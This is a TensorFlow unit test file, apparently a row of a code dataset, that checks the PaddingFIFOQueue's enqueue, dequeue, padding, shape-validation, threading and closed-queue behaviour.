source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
padding_fifo_queue_test.py
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.data_flow_ops.PaddingFIFOQueue."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import time
# pylint: disable=unused-import,g-bad-import-order
import tensorflow.python.platform
# pylint: enable=unused-import,g-bad-import-order
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
class PaddingFIFOQueueTest(tf.test.TestCase):
def testConstructor(self):
with tf.Graph().as_default():
q = tf.PaddingFIFOQueue(10, tf.float32, ((None,),), name="Q")
self.assertTrue(isinstance(q.queue_ref, tf.Tensor))
self.assertEquals(tf.string_ref, q.queue_ref.dtype)
self.assertProtoEquals("""
name:'Q' op:'PaddingFIFOQueue'
attr { key: 'component_types' value { list { type: DT_FLOAT } } }
attr { key: 'shapes' value { list { shape { dim { size: -1 } } } } }
attr { key: 'capacity' value { i: 10 } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: '' } }
""", q.queue_ref.op.node_def)
def testMultiQueueConstructor(self):
with tf.Graph().as_default():
q = tf.PaddingFIFOQueue(5, (tf.int32, tf.float32),
((), ()),
shared_name="foo", name="Q")
self.assertTrue(isinstance(q.queue_ref, tf.Tensor))
self.assertEquals(tf.string_ref, q.queue_ref.dtype)
self.assertProtoEquals("""
name:'Q' op:'PaddingFIFOQueue'
attr { key: 'component_types' value { list {
type: DT_INT32 type : DT_FLOAT
} } }
attr { key: 'shapes' value { list { shape { } shape { } } } }
attr { key: 'capacity' value { i: 5 } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: 'foo' } }
""", q.queue_ref.op.node_def)
def testConstructorWithShapes(self):
with tf.Graph().as_default():
q = tf.PaddingFIFOQueue(5, (tf.int32, tf.float32),
shapes=(tf.TensorShape([1, 1, 2, 3]),
tf.TensorShape([5, 8])), name="Q")
self.assertTrue(isinstance(q.queue_ref, tf.Tensor))
self.assertEquals(tf.string_ref, q.queue_ref.dtype)
self.assertProtoEquals("""
name:'Q' op:'PaddingFIFOQueue'
attr { key: 'component_types' value { list {
type: DT_INT32 type : DT_FLOAT
} } }
attr { key: 'shapes' value { list {
shape { dim { size: 1 }
dim { size: 1 }
dim { size: 2 }
dim { size: 3 } }
shape { dim { size: 5 }
dim { size: 8 } }
} } }
attr { key: 'capacity' value { i: 5 } }
attr { key: 'container' value { s: '' } }
attr { key: 'shared_name' value { s: '' } }
""", q.queue_ref.op.node_def)
def testEnqueue(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
enqueue_op = q.enqueue((10.0,))
enqueue_op.run()
def testEnqueueWithShape(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, shapes=((3, 2),))
enqueue_correct_op = q.enqueue(([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],))
enqueue_correct_op.run()
with self.assertRaises(ValueError):
q.enqueue(([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]],))
self.assertEqual(1, q.size().eval())
def testEnqueueManyWithShape(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, [tf.int32, tf.int32],
shapes=[(), (2,)])
q.enqueue_many([[1, 2, 3, 4], [[1, 1], [2, 2], [3, 3], [4, 4]]]).run()
self.assertEqual(4, q.size().eval())
def testParallelEnqueue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Run one producer thread for each element in elems.
def enqueue(enqueue_op):
sess.run(enqueue_op)
threads = [self.checkedThread(target=enqueue, args=(e,))
for e in enqueue_ops]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# Dequeue every element using a single thread.
results = []
for _ in xrange(len(elems)):
results.append(dequeued_t.eval())
self.assertItemsEqual(elems, results)
def testParallelDequeue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
# Enqueue every element using a single thread.
for enqueue_op in enqueue_ops:
enqueue_op.run()
# Run one consumer thread for each element in elems.
results = []
def dequeue():
results.append(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in enqueue_ops]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, results)
def testDequeue(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
for i in xrange(len(elems)):
vals = dequeued_t.eval()
self.assertEqual([elems[i]], vals)
def testEnqueueAndBlockingDequeue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(3, tf.float32, ((),))
elems = [10.0, 20.0, 30.0]
enqueue_ops = [q.enqueue((x,)) for x in elems]
dequeued_t = q.dequeue()
def enqueue():
# The enqueue_ops should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for enqueue_op in enqueue_ops:
sess.run(enqueue_op)
results = []
def dequeue():
for _ in xrange(len(elems)):
results.append(sess.run(dequeued_t))
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
for elem, result in zip(elems, results):
self.assertEqual([elem], result)
def testMultiEnqueueAndDequeue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, (tf.int32, tf.float32), ((), ()))
elems = [(5, 10.0), (10, 20.0), (15, 30.0)]
enqueue_ops = [q.enqueue((x, y)) for x, y in elems]
dequeued_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
for i in xrange(len(elems)):
x_val, y_val = sess.run(dequeued_t)
x, y = elems[i]
self.assertEqual([x], x_val)
self.assertEqual([y], y_val)
def testQueueSizeEmpty(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
self.assertEqual([0], q.size().eval())
def testQueueSizeAfterEnqueueAndDequeue(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue()
size = q.size()
self.assertEqual([], size.get_shape())
enqueue_op.run()
self.assertEqual(1, size.eval())
dequeued_t.op.run()
self.assertEqual(0, size.eval())
def testEnqueueMany(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
for i in range(8):
vals = dequeued_t.eval()
self.assertEqual([elems[i % 4]], vals)
def testEmptyEnqueueMany(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((None, None),))
empty_t = tf.constant([], dtype=tf.float32,
shape=[0, 2, 3])
enqueue_op = q.enqueue_many((empty_t,))
size_t = q.size()
self.assertEqual([0], size_t.eval())
enqueue_op.run()
self.assertEqual([0], size_t.eval())
def testEmptyDequeueMany(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, shapes=((),))
enqueue_op = q.enqueue((10.0,))
dequeued_t = q.dequeue_many(0)
self.assertEqual([], dequeued_t.eval().tolist())
enqueue_op.run()
self.assertEqual([], dequeued_t.eval().tolist())
def testEmptyDequeueManyWithDynamicShape(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, shapes=((None,),))
enqueue_op = q.enqueue(([10.0],))
dequeued_t = q.dequeue_many(0)
self.assertEqual([], dequeued_t.eval().tolist())
enqueue_op.run()
self.assertEqual([], dequeued_t.eval().tolist())
def testConstructPaddingFIFOQueueWithNoShape(self):
with self.test_session():
with self.assertRaisesRegexp(
ValueError,
r"When providing partial shapes, a list of shapes must be provided."):
tf.PaddingFIFOQueue(10, tf.float32, None).queue_ref.eval()
def testMultiEnqueueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, (tf.float32, tf.int32), ((), (2,)))
float_elems = [10.0, 20.0, 30.0, 40.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
for i in range(8):
float_val, int_val = sess.run(dequeued_t)
self.assertEqual(float_elems[i % 4], float_val)
self.assertAllEqual(int_elems[i % 4], int_val)
def testMultiEnqueueManyWithPartiallyKnownShapes(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(
10, (tf.float32, tf.int32), shapes=((), (None,)))
float_elems = [10.0, 20.0, 30.0, 40.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue()
enqueue_op.run()
enqueue_op.run()
for i in range(8):
float_val, int_val = sess.run(dequeued_t)
self.assertEqual(float_elems[i % 4], float_val)
self.assertAllEqual(int_elems[i % 4], int_val)
def testDequeueMany(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(4)
enqueue_op.run()
self.assertAllEqual(elems[0:4], dequeued_t.eval())
self.assertAllEqual(elems[4:8], dequeued_t.eval())
def testMultiDequeueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, (tf.float32, tf.int32),
shapes=((), (2,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10],
[11, 12], [13, 14], [15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_many(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
float_val, int_val = sess.run(dequeued_t)
self.assertAllEqual(float_elems[0:4], float_val)
self.assertAllEqual(int_elems[0:4], int_val)
self.assertEqual(float_val.shape, dequeued_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_t[1].get_shape())
float_val, int_val = sess.run(dequeued_t)
self.assertAllEqual(float_elems[4:8], float_val)
self.assertAllEqual(int_elems[4:8], int_val)
float_val, int_val = sess.run(dequeued_single_t)
self.assertAllEqual(float_elems[8], float_val)
self.assertAllEqual(int_elems[8], int_val)
self.assertEqual(float_val.shape, dequeued_single_t[0].get_shape())
self.assertEqual(int_val.shape, dequeued_single_t[1].get_shape())
def testMultiDequeueManyWithPartiallyKnownShapes(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, (tf.float32, tf.int32), shapes=((), (None,)))
float_elems = [
10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
int_elems = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10],
[11, 12], [13, 14], [15, 16], [17, 18], [19, 20]]
enqueue_op = q.enqueue_many((float_elems, int_elems))
dequeued_t = q.dequeue_many(4)
dequeued_single_t = q.dequeue()
enqueue_op.run()
float_val, int_val = sess.run(dequeued_t)
self.assertAllEqual(float_elems[0:4], float_val)
self.assertAllEqual(int_elems[0:4], int_val)
self.assertTrue(
tf.TensorShape(float_val.shape).is_compatible_with(
dequeued_t[0].get_shape()))
self.assertTrue(
tf.TensorShape(int_val.shape).is_compatible_with(
dequeued_t[1].get_shape()))
float_val, int_val = sess.run(dequeued_t)
self.assertAllEqual(float_elems[4:8], float_val)
self.assertAllEqual(int_elems[4:8], int_val)
float_val, int_val = sess.run(dequeued_single_t)
self.assertAllEqual(float_elems[8], float_val)
self.assertAllEqual(int_elems[8], int_val)
self.assertTrue(
tf.TensorShape(float_val.shape).is_compatible_with(
dequeued_single_t[0].get_shape()))
self.assertTrue(
tf.TensorShape(int_val.shape).is_compatible_with(
dequeued_single_t[1].get_shape()))
def testMultiDequeueManyWithPartiallyKnownShapesAndVariableSizeInput(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, (tf.string, tf.int32),
shapes=((None,), (1, None)))
str_elems = [
["a"],
["ab"],
["abc"],
["abc", "d"],
["abc", "d", "e"],
["abc", "d", "e", "f"]]
int_elems = [
[[1]],
[[2]],
[[3]],
[[1, 2]],
[[1, 2, 3]],
[[1, 2, 3, 4]]]
enqueue_ops = [q.enqueue((str_elems[i], int_elems[i])) for i in range(6)]
dequeued_t = q.dequeue_many(5)
dequeued_single_t = q.dequeue()
for enqueue_op in enqueue_ops:
enqueue_op.run()
string_val, int_val = sess.run(dequeued_t)
self.assertAllEqual(
[[b"a", b"", b""], [b"ab", b"", b""], [b"abc", b"", b""],
[b"abc", b"d", b""], [b"abc", b"d", b"e"]], string_val)
self.assertAllEqual(
[[[1, 0, 0]],
[[2, 0, 0]],
[[3, 0, 0]],
[[1, 2, 0]],
[[1, 2, 3]]],
int_val)
self.assertTrue(
tf.TensorShape(string_val.shape).is_compatible_with(
dequeued_t[0].get_shape()))
self.assertTrue(
tf.TensorShape(int_val.shape).is_compatible_with(
dequeued_t[1].get_shape()))
string_val, int_val = sess.run(dequeued_single_t)
self.assertAllEqual([b"abc", b"d", b"e", b"f"], string_val)
self.assertAllEqual([[1, 2, 3, 4]], int_val)
self.assertTrue(
tf.TensorShape(string_val.shape).is_compatible_with(
dequeued_single_t[0].get_shape()))
self.assertTrue(
tf.TensorShape(int_val.shape).is_compatible_with(
dequeued_single_t[1].get_shape()))
def testHighDimension(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.int32, ((4, 4, 4, 4),))
elems = np.array([[[[[x] * 4] * 4] * 4] * 4 for x in range(10)], np.int32)
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(10)
enqueue_op.run()
self.assertAllEqual(dequeued_t.eval(), elems)
def testPartiallyKnownHighDimension(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.int32, ((4, None, 4, None),))
elems = np.array([[[[[x] * 4] * 4] * 4] * 4 for x in range(10)], np.int32)
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(10)
enqueue_op.run()
self.assertAllEqual(dequeued_t.eval(), elems)
def testEnqueueWrongShape(self):
q = tf.PaddingFIFOQueue(10, (tf.int32, tf.int32), ((), (2,)))
with self.assertRaises(ValueError):
q.enqueue(([1, 2], [2, 2]))
with self.assertRaises(ValueError):
q.enqueue_many((7, [[1, 2], [3, 4], [5, 6]]))
def testBatchSizeMismatch(self):
q = tf.PaddingFIFOQueue(10, (tf.int32, tf.int32, tf.int32), ((), (), ()))
with self.assertRaises(ValueError):
q.enqueue_many(([1, 2, 3], [1, 2], [1, 2, 3]))
with self.assertRaises(ValueError):
q.enqueue_many(([1, 2, 3], [1, 2], tf.placeholder(tf.int32)))
with self.assertRaises(ValueError):
q.enqueue_many((tf.placeholder(tf.int32), [1, 2], [1, 2, 3]))
def testEnqueueManyEmptyTypeConversion(self):
q = tf.PaddingFIFOQueue(10, (tf.int32, tf.float32), ((), ()))
enq = q.enqueue_many(([], []))
self.assertEqual(tf.int32, enq.inputs[1].dtype)
self.assertEqual(tf.float32, enq.inputs[2].dtype)
def testEnqueueWrongType(self):
q = tf.PaddingFIFOQueue(10, (tf.int32, tf.float32), ((), ()))
with self.assertRaises(ValueError):
q.enqueue((tf.placeholder(tf.int32), tf.placeholder(tf.int32)))
with self.assertRaises(ValueError):
q.enqueue_many((tf.placeholder(tf.int32), tf.placeholder(tf.int32)))
def testEnqueueWrongPartiallyKnownShapeAtRuntime(self):
with self.test_session() as sess:
# First dimension of second component is unknown, second
# dimension must be 3.
q = tf.PaddingFIFOQueue(10, (tf.int32, tf.int32), ((2, 2), (None, 3)))
elems_ok = np.array([1] * 4).reshape((2, 2)).astype(np.int32)
elems_bad = tf.placeholder(tf.int32)
enqueue_op = q.enqueue((elems_ok, elems_bad))
with self.assertRaisesRegexp(
tf.errors.InvalidArgumentError, r"Expected \[\?,3\], got \[3,4\]"):
sess.run([enqueue_op],
feed_dict={elems_bad: np.array([1] * 12).reshape((3, 4))})
def testEnqueueDequeueManyWrongPartiallyKnownShape(self):
with self.test_session() as sess:
# First dimension of second component is unknown, second
# dimension must be 3.
q = tf.PaddingFIFOQueue(10, (tf.int32, tf.int32), ((2, 2), (None, 3)))
elems_ok = np.array([1] * 8).reshape((2, 2, 2)).astype(np.int32)
elems_bad = tf.placeholder(tf.int32)
enqueue_op = q.enqueue_many((elems_ok, elems_bad))
dequeued_t = q.dequeue_many(2)
with self.assertRaisesRegexp(
tf.errors.InvalidArgumentError,
"Shape mismatch in tuple component 1. "
r"Expected \[2,\?,3\], got \[2,3,4\]"):
sess.run([enqueue_op],
feed_dict={elems_bad: np.array([1] * 24).reshape((2, 3, 4))})
dequeued_t.eval()
def testParallelEnqueueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(1000, tf.float32, shapes=((),))
elems = [10.0 * x for x in range(100)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(1000)
# Enqueue 100 items in parallel on 10 threads.
def enqueue():
sess.run(enqueue_op)
threads = [self.checkedThread(target=enqueue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(dequeued_t.eval(), elems * 10)
def testParallelDequeueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(1000, tf.float32, shapes=((),))
elems = [10.0 * x for x in range(1000)]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(100)
enqueue_op.run()
# Dequeue 100 items in parallel on 10 threads.
dequeued_elems = []
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t))
threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertItemsEqual(elems, dequeued_elems)
def testParallelEnqueueAndDequeue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(50, tf.float32, shapes=((),))
initial_elements = [10.0] * 49
q.enqueue_many((initial_elements,)).run()
enqueue_op = q.enqueue((20.0,))
dequeued_t = q.dequeue()
def enqueue():
for _ in xrange(100):
sess.run(enqueue_op)
def dequeue():
for _ in xrange(100):
self.assertTrue(sess.run(dequeued_t) in (10.0, 20.0))
enqueue_threads = [self.checkedThread(target=enqueue) for _ in range(10)]
dequeue_threads = [self.checkedThread(target=dequeue) for _ in range(10)]
for enqueue_thread in enqueue_threads:
enqueue_thread.start()
for dequeue_thread in dequeue_threads:
dequeue_thread.start()
for enqueue_thread in enqueue_threads:
enqueue_thread.join()
for dequeue_thread in dequeue_threads:
dequeue_thread.join()
# Dequeue the initial count of elements to clean up.
cleanup_elems = q.dequeue_many(49).eval()
for elem in cleanup_elems:
self.assertTrue(elem in (10.0, 20.0))
def testMixtureOfEnqueueAndEnqueueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.int32, shapes=((),))
enqueue_placeholder = tf.placeholder(tf.int32, shape=())
enqueue_op = q.enqueue((enqueue_placeholder,))
enqueuemany_placeholder = tf.placeholder(
tf.int32, shape=(None,))
enqueuemany_op = q.enqueue_many((enqueuemany_placeholder,))
dequeued_t = q.dequeue()
close_op = q.close()
def dequeue():
for i in xrange(250):
self.assertEqual(i, sess.run(dequeued_t))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
elements_enqueued = 0
while elements_enqueued < 250:
# With equal probability, run Enqueue or enqueue_many.
if random.random() > 0.5:
enqueue_op.run({enqueue_placeholder: elements_enqueued})
elements_enqueued += 1
else:
count = random.randint(0, min(20, 250 - elements_enqueued))
range_to_enqueue = np.arange(elements_enqueued,
elements_enqueued + count,
dtype=np.int32)
enqueuemany_op.run({enqueuemany_placeholder: range_to_enqueue})
elements_enqueued += count
close_op.run()
dequeue_thread.join()
self.assertEqual(0, q.size().eval())
def testMixtureOfDequeueAndDequeueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.int32, shapes=((),))
enqueue_op = q.enqueue_many((np.arange(250, dtype=np.int32),))
dequeued_t = q.dequeue()
count_placeholder = tf.placeholder(tf.int32, shape=())
dequeuemany_t = q.dequeue_many(count_placeholder)
def enqueue():
sess.run(enqueue_op)
enqueue_thread = self.checkedThread(target=enqueue)
enqueue_thread.start()
elements_dequeued = 0
while elements_dequeued < 250:
# With equal probability, run Dequeue or dequeue_many.
if random.random() > 0.5:
self.assertEqual(elements_dequeued, dequeued_t.eval())
elements_dequeued += 1
else:
count = random.randint(0, min(20, 250 - elements_dequeued))
expected_range = np.arange(elements_dequeued,
elements_dequeued + count,
dtype=np.int32)
self.assertAllEqual(
expected_range, dequeuemany_t.eval({count_placeholder: count}))
elements_dequeued += count
q.close().run()
enqueue_thread.join()
self.assertEqual(0, q.size().eval())
def testBlockingDequeueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
dequeued_t = q.dequeue_many(4)
dequeued_elems = []
def enqueue():
# The enqueue_op should run after the dequeue op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
sess.run(enqueue_op)
def dequeue():
dequeued_elems.extend(sess.run(dequeued_t).tolist())
enqueue_thread = self.checkedThread(target=enqueue)
dequeue_thread = self.checkedThread(target=dequeue)
enqueue_thread.start()
dequeue_thread.start()
enqueue_thread.join()
dequeue_thread.join()
self.assertAllEqual(elems, dequeued_elems)
def testDequeueManyWithTensorParameter(self):
with self.test_session():
# Define a first queue that contains integer counts.
dequeue_counts = [random.randint(1, 10) for _ in range(100)]
count_q = tf.PaddingFIFOQueue(100, tf.int32, ((),))
enqueue_counts_op = count_q.enqueue_many((dequeue_counts,))
total_count = sum(dequeue_counts)
# Define a second queue that contains total_count elements.
elems = [random.randint(0, 100) for _ in range(total_count)]
q = tf.PaddingFIFOQueue(total_count, tf.int32, ((),))
enqueue_elems_op = q.enqueue_many((elems,))
# Define a subgraph that first dequeues a count, then DequeuesMany
# that number of elements.
dequeued_t = q.dequeue_many(count_q.dequeue())
enqueue_counts_op.run()
enqueue_elems_op.run()
dequeued_elems = []
for _ in dequeue_counts:
dequeued_elems.extend(dequeued_t.eval())
self.assertEqual(elems, dequeued_elems)
def testDequeueFromClosedQueue(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
close_op.run()
for elem in elems:
self.assertEqual([elem], dequeued_t.eval())
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.OutOfRangeError,
"is closed and has insufficient"):
dequeued_t.eval()
def testBlockingDequeueFromClosedQueue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue()
enqueue_op.run()
def dequeue():
for elem in elems:
self.assertEqual([elem], sess.run(dequeued_t))
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueFromClosedEmptyQueue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue()
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueManyFromClosedQueue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
enqueue_op.run()
def dequeue():
self.assertAllEqual(elems, sess.run(dequeued_t))
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testEnqueueManyLargerThanCapacityWithConcurrentDequeueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(4, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
dequeued_t = q.dequeue_many(3)
cleanup_dequeue_t = q.dequeue()
def enqueue():
sess.run(enqueue_op)
def dequeue():
self.assertAllEqual(elems[0:3], sess.run(dequeued_t))
with self.assertRaises(tf.errors.OutOfRangeError):
sess.run(dequeued_t)
self.assertEqual(elems[3], sess.run(cleanup_dequeue_t))
def close():
sess.run(close_op)
enqueue_thread = self.checkedThread(target=enqueue)
enqueue_thread.start()
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_thread = self.checkedThread(target=close)
close_thread.start()
enqueue_thread.join()
dequeue_thread.join()
close_thread.join()
def testClosedBlockingDequeueManyRestoresPartialBatch(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(4, (tf.float32, tf.float32), ((), ()))
elems_a = [1.0, 2.0, 3.0]
elems_b = [10.0, 20.0, 30.0]
enqueue_op = q.enqueue_many((elems_a, elems_b))
dequeued_a_t, dequeued_b_t = q.dequeue_many(4)
cleanup_dequeue_a_t, cleanup_dequeue_b_t = q.dequeue()
close_op = q.close()
enqueue_op.run()
def dequeue():
with self.assertRaises(tf.errors.OutOfRangeError):
sess.run([dequeued_a_t, dequeued_b_t])
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
# Test that the elements in the partially-dequeued batch are
# restored in the correct order.
for elem_a, elem_b in zip(elems_a, elems_b):
val_a, val_b = sess.run([cleanup_dequeue_a_t, cleanup_dequeue_b_t])
self.assertEqual(elem_a, val_a)
self.assertEqual(elem_b, val_b)
self.assertEqual(0, q.size().eval())
def testBlockingDequeueManyFromClosedEmptyQueue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.OutOfRangeError,
"is closed and has insufficient"):
sess.run(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testEnqueueToClosedQueue(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
enqueue_op = q.enqueue((10.0,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.AbortedError, "is closed"):
enqueue_op.run()
def testEnqueueManyToClosedQueue(self):
with self.test_session():
q = tf.PaddingFIFOQueue(10, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegexp(tf.errors.AbortedError, "is closed"):
enqueue_op.run()
def testBlockingEnqueueToFullQueue(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(4, tf.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
sess.run(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
for elem in elems:
self.assertEqual([elem], dequeued_t.eval())
self.assertEqual([50.0], dequeued_t.eval())
thread.join()
